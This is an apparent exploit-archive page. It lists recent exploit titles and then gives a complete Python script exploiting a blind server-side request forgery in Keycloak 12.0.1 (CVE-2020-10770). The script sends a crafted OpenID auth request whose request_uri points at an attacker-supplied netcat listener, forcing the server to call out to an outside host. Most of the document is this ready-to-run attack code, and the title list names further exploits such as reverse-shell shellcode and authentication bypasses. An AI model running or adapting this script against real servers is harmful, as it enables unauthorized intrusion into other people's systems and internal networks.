
28 changes to exploits/shellcodes Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH) Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated) Simple Payroll System 1.0 - SQLi Authentication Bypass Dolibarr ERP/CRM 14.0.1 - Privilege Escalation Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Budget and Expense Tracker System 1.0 - Arbitrary File Upload FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated) Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE) Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF) Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass Simple Issue Tracker System 1.0 - SQLi Authentication Bypass Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS) Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS) Sonicwall SonicOS 7.0 - Host Header Injection Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
52 lines
No EOL
1.7 KiB
Python
Executable file
52 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
|
|
# Date: 2021-10-09
|
|
# Exploit Author: Mayank Deshmukh
|
|
# Vendor Homepage: https://www.keycloak.org/
|
|
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
|
|
# Version: versions < 12.0.2
|
|
# Tested on: Kali Linux
|
|
# CVE : CVE-2020-10770
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import argparse, textwrap
|
|
import requests
|
|
import sys
|
|
|
|
parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter,
|
|
epilog=textwrap.dedent('''
|
|
Exploit Usage :
|
|
./exploit.py -u http://127.0.0.1:8080
|
|
[^] Input Netcat host:port -> 192.168.0.1:4444
|
|
'''))
|
|
|
|
parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
|
|
args = parser.parse_args()
|
|
|
|
if len(sys.argv) <= 2:
|
|
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
|
|
sys.exit()
|
|
|
|
# Variables
|
|
Host = args.url
|
|
|
|
r = requests.session()
|
|
|
|
def ssrf():
|
|
headerscontent = {
|
|
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
|
|
}
|
|
hook = input("[^] Input Netcat host:port -> ")
|
|
|
|
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
|
|
return True
|
|
|
|
if __name__ == "__main__":
|
|
|
|
print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
|
|
try:
|
|
if ssrf() == True:
|
|
print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
|
|
|
|
except Exception as ex:
|
|
print('\n[-] Invalid URL or Target not Vulnerable') |